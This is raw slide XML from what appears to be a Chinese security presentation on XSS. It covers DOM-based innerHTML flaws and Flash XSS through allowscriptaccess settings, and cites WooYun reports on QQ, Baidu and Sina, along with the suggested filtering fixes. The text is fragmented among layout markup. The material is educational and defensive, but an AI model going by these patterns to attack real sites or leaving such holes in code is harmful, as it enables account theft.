            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>gainover,QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>邮箱音乐功能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5845750"/>
            <a:ext cx="561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共同点：读取自定义属性，然后进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>操作。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6286520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解决方案：在读取属性之后，对属性中的特殊字符进行二次过滤。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709856" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4709856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52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Dom-based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0034" y="928670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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>="\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>uXXXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>引发的惨案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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366" y="1397639"/>
            <a:ext cx="5219700" cy="3228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直接箭头连接符 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3714744" y="2214554"/>
            <a:ext cx="785818" cy="785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0800000" flipV="1">
            <a:off x="2285984" y="3143248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5286388"/>
            <a:ext cx="564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wooyun-2010-08487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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>腾讯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WEBQQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>聊天功能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472" y="48266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实际案例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5074" y="14287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大多数厂商的做法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15074" y="192880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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>替换为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\\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46171" y="235743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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>替换为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30976" y="2772611"/>
            <a:ext cx="303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data.name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>进行二次过滤，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt; , &gt;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lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>gt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472" y="5715016"/>
            <a:ext cx="485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wooyun-2010-010167 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>imlonghao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>搜狐微博 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28596" y="928670"/>
            <a:ext cx="5429288" cy="785818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28596" y="5000636"/>
            <a:ext cx="5429288" cy="1428760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00034" y="285728"/>
            <a:ext cx="4754741" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4754741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97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Flash-based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57158" y="3143248"/>
            <a:ext cx="104804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Flash XSS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428728" y="2643182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428728" y="3429000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5984" y="3929066"/>
            <a:ext cx="87716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存储型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5984" y="2500306"/>
            <a:ext cx="87716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反射型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="右弧形箭头 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3428992" y="2714620"/>
            <a:ext cx="571504" cy="1285884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3372" y="31432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正常的存储行为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5786" y="1142984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图片上传组件，视频播放器，音乐播放器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>… </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="下箭头 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2500298" y="1857364"/>
            <a:ext cx="428628" cy="42862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2500298" y="4446782"/>
            <a:ext cx="428628" cy="42862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85852" y="5072074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日志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未过滤，或过滤不严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30396" y="5500702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FLASH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>相册，对加载图片未判断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99299" y="5929330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其它一些有加载图片功能的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6000760" y="2643182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29454" y="38576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第三方插件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6072198" y="335756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16" y="32146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第三方应用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000760" y="3500438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58016" y="242886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sameDomain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754741" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4754741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97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Flash-based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0034" y="928670"/>
            <a:ext cx="301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常规的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Flash-based</a:t>
            </a:r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1357298"/>
            <a:ext cx="4572000" cy="20313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smtClean="0"/>
              <a:t>&lt;embed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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FLASH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>" quality="high" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bgcolor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="#FFFFFF" width="950" height="250" name="chart" align="middle" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>allowscriptaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>" type="application/x-shockwave-flash" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pluginspage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="http://www.macromedia.com/go/getflashplayer" id="chart"&gt;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86380" y="1357298"/>
            <a:ext cx="3222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最低级的漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> FLASH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>地址任何填写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034" y="5997379"/>
            <a:ext cx="5286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wooyun-2010-07684 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 QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>空间礼物功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>wooyun-2010-08354 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>百度贴吧存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="下箭头 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500826" y="2285992"/>
            <a:ext cx="500066" cy="100013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57818" y="3571876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稍微进化一点</a:t>
            </a:r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Always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> FLASH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>地址固定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;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会调用外部图片或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SWF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1472" y="3714752"/>
            <a:ext cx="1500198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正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FLASH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214546" y="400050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643306" y="3714752"/>
            <a:ext cx="1500198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恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FLASH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214678" y="400050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1472" y="4857760"/>
            <a:ext cx="229414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参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>?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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx.jpg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602833" y="3759296"/>
            <a:ext cx="500066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2285984" y="4429132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43240" y="4857760"/>
            <a:ext cx="156966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读取配置文件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16200000" flipV="1">
            <a:off x="3107521" y="4393413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429256" y="4857760"/>
            <a:ext cx="3000396" cy="9286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&lt;profile&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;head&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>xxx.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;/profile&gt;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 rot="10800000">
            <a:off x="4857752" y="50720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下箭头 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572264" y="5929330"/>
            <a:ext cx="500066" cy="71438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04237" y="5425875"/>
            <a:ext cx="4707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wooyun-2010-01768 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>p.z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>新浪微博存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>wooyun-2010-01634 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>p.z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>百度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贴吧存储型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标注 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500694" y="214290"/>
            <a:ext cx="3429024" cy="857256"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39657"/>
              <a:gd name="adj2" fmla="val 65189"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="6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00034" y="285728"/>
            <a:ext cx="4754741" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4754741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97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Flash-based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572000" y="1214422"/>
            <a:ext cx="4225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再次进化一点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sameDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>同域名下反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FLASH XSS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3042" y="1000108"/>
            <a:ext cx="188064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sameDomain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2428860" y="164305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8662" y="1857364"/>
            <a:ext cx="354135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只允许使用同域名下的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2000232" y="2500306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720" y="42862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无法执行了吧～，高枕无忧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16200000" flipH="1">
            <a:off x="3214678" y="2428868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8992" y="3071810"/>
            <a:ext cx="307968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同域名下的缺陷型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282" y="3071810"/>
            <a:ext cx="30796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不同域名下的恶意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1464447" y="3750471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图片 21" descr="monster_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4643446"/>
            <a:ext cx="1750596" cy="1750596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="monster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2330" y="1785926"/>
            <a:ext cx="1393406" cy="1393406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="上弧形箭头 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19989031" flipH="1">
            <a:off x="6106652" y="2388888"/>
            <a:ext cx="857256" cy="357190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58082" y="314324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程序员 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57224" y="628652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程序员 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4357686" y="4357694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14876" y="5357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被恶意利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="图片 32" descr="monster_0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29454" y="3786190"/>
            <a:ext cx="1750596" cy="1750596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="右弧形箭头 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7273663">
            <a:off x="6253731" y="4014394"/>
            <a:ext cx="428628" cy="1000132"/>
          </a:xfrm>
          <a:prstGeom prst="curved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8992" y="3500438"/>
            <a:ext cx="307968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同域名下允许上传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00958" y="5572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某黑客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357554" y="5929330"/>
            <a:ext cx="432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wooyun-2010-03314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 QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>邮箱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357554" y="6286520"/>
            <a:ext cx="5021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wooyun-2010-06103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 QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>空间存储型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78883" y="312622"/>
            <a:ext cx="3337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allowscriptaccess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sameDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>allowscriptaccess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默认属性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214282" y="2857496"/>
            <a:ext cx="3357586" cy="1000132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00034" y="285728"/>
            <a:ext cx="4754741" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4754741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97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Flash-based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687680" y="2857496"/>
            <a:ext cx="4456220" cy="1000132"/>
            <a:chOff x="2500298" y="2857496"/>
            <a:chExt cx="4456220" cy="1000132"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="矩形 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2500298" y="2857496"/>
              <a:ext cx="4429156" cy="10001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0298" y="3469341"/>
              <a:ext cx="4456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flash.external.ExternalInterface.call</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>("JS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>代码</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>")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00298" y="3183589"/>
              <a:ext cx="4250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navigateToURL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>(new </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
                <a:t>URLRequest</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>("JS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>代码</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>"))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00298" y="2897837"/>
              <a:ext cx="1883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getURL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>("JS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>代码</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>");</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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715008" y="1928802"/>
            <a:ext cx="228357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loaderInfo.parameters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43306" y="1000108"/>
            <a:ext cx="22472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xxx.swf?func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = JS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00826" y="1000108"/>
            <a:ext cx="247375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flashvars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=JS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"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rot="16200000" flipH="1">
            <a:off x="5679289" y="1535893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>
            <a:off x="7072330" y="1643050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6200000" flipH="1">
            <a:off x="6793260" y="2565063"/>
            <a:ext cx="416486" cy="1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0034" y="5072074"/>
            <a:ext cx="1785950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App.baidu.com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5786" y="4643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百度应用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500298" y="52863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57422" y="4857760"/>
            <a:ext cx="7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iframe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214678" y="5072074"/>
            <a:ext cx="1785950" cy="50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xxx.duapp.com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143504" y="52863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72066" y="4857760"/>
            <a:ext cx="7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iframe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000760" y="5072074"/>
            <a:ext cx="300039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App.baidu.com/xxx.swf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28794" y="40719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合法的存储行为</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="上弧形箭头 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214546" y="4500570"/>
            <a:ext cx="1143008" cy="428628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3306" y="46434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开发者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14678" y="5715016"/>
            <a:ext cx="1785950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developer.com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714744" y="642939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………..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00760" y="585789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黑客</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本身是开发者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rot="10800000">
            <a:off x="5214942" y="600076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14942" y="61436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攻击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-357222" y="4000504"/>
            <a:ext cx="9787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圆角右箭头 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7858148" y="3714752"/>
            <a:ext cx="1500198" cy="642942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0153" y="1000108"/>
            <a:ext cx="18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反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FLASH XSS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1250" y="1428736"/>
            <a:ext cx="469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FLASH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>开发人员缺乏安全意识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jwplayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, open flash chart, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>swfupload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>类程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>…)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66093" y="2071678"/>
            <a:ext cx="460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FLASH XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以绕过主流浏览器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS Filter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69738" y="2433071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传统扫描器不易扫描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14282" y="2857496"/>
            <a:ext cx="216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WooYun-2012-07050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4282" y="3143248"/>
            <a:ext cx="21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Wooyun-2010-07085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4282" y="3500438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新浪微博，淘宝网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盗取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8596" y="5857892"/>
            <a:ext cx="2426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Wooyun-2010-08318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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>百度应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS)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285728"/>
            <a:ext cx="2470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什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>攻击？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="椭圆 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500034" y="390203"/>
            <a:ext cx="214314" cy="21431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107125" y="4964917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214282" y="1142984"/>
            <a:ext cx="2031325" cy="2789471"/>
            <a:chOff x="5929322" y="500042"/>
            <a:chExt cx="2031325" cy="2789471"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6000760" y="5000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29322" y="500042"/>
              <a:ext cx="2031325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个人资料信息填写</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>发表一篇日志</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>发表一篇留言</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>发表一篇评论</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>提出一个问题</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>回答一个问题</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>…..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29322" y="2643182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地址栏参数</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>Dom</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>属性</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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28596" y="5929330"/>
            <a:ext cx="87716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攻击者</a:t>
            </a:r>
